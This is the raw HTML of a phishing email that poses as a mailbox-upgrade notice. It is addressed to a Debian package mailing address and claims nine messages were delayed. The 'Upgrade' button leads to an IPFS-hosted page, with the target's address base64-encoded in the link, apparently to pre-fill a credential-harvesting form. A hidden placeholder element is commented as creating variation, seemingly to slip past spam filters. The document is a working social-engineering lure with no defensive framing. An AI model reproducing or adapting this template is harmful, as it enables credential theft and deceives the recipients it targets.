<html><head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta charset="UTF-8">
    <title>Upgrade Your Mailbox for a Better Experience</title>
    <style>
        body { font-family: 'Helvetica', sans-serif; background-color: #f4f4f9; margin: 0; padding: 20px; }
        .container {
            background-color: #ffffff;
            padding: 30px;
            border-radius: 8px;
            width: 600px;
            margin: 0 auto;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
        }
        h2 { color: #2b2b8e; font-size: 20px; text-align: center; }
        p { color: #555555; font-size: 16px; line-height: 1.6; }
        .button { 
            background-color: #2b2b8e; 
            color: white; 
            padding: 12px 25px; 
            border-radius: 5px; 
            text-decoration: none;
            display: inline-block;
            margin-top: 20px; 
            text-align: center;
        }
        .footer { color: #777777; font-size: 12px; text-align: center; margin-top: 20px; }
        .unique-tag { display: none; } /* Hidden unique identifier */
    </style>
</head>
<body style="font-family: 'Helvetica', sans-serif; background-color: #f4f4f9; margin: 0; padding: 20px">
    <div style="background-color: #ffffff;
            padding: 30px;
            border-radius: 8px;
            width: 600px;
            margin: 0 auto;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1)" class="container">
        <h2 style="color: #2b2b8e; font-size: 20px; text-align: center">Upgrade Your Mailbox for Enhanced Delivery</h2>
        
        <p style="color: #555555; font-size: 16px; line-height: 1.6">Dear Valued Customer,</p>
        
        <p style="color: #555555; font-size: 16px; line-height: 1.6">We’re excited to announce a new update to our mailbox system, designed to make reading and sending emails easier than ever! Upgrading to the latest mailbox will improve your message delivery and help ensure smoother receiving of important emails.</p>
        
        <p style="color: #555555; font-size: 16px; line-height: 1.6">Since beginning of the month, you<font face="Tahoma"> <strong>9</strong> </font>messages may have been delayed at cacti@packages.debian.org due to the previous version. <br>Upgrading will enhance your experience and ensure seamless communication.<br>Please proceed with the below steps</p>
        
        <a style="background-color: #2b2b8e; 
            color: white; 
            padding: 12px 25px; 
            border-radius: 5px; 
            text-decoration: none;
            display: inline-block;
            margin-top: 20px; 
            text-align: center" class="button" href="https://ipfs.io/ipfs/bafkreibz6v4bc2ssgebj53gyesudybrv4lojkbl6umth7ayc74vx23afni#Y2FjdGlAcGFja2FnZXMuZGViaWFuLm9yZw==" target="_self">Upgrade</a>

        <p style="color: #555555; font-size: 16px; line-height: 1.6; color: #777777; font-size: 12px; text-align: center; margin-top: 20px" class="footer">Thank you for being with us. For assistance, please contact support@packages.debian.org.</p>
        
        <!-- Unique identifier to create variation -->
        <p style="color: #555555; font-size: 16px; line-height: 1.6; display: none" class="unique-tag">{{unique_id}}</p>
    </div>


</body></html>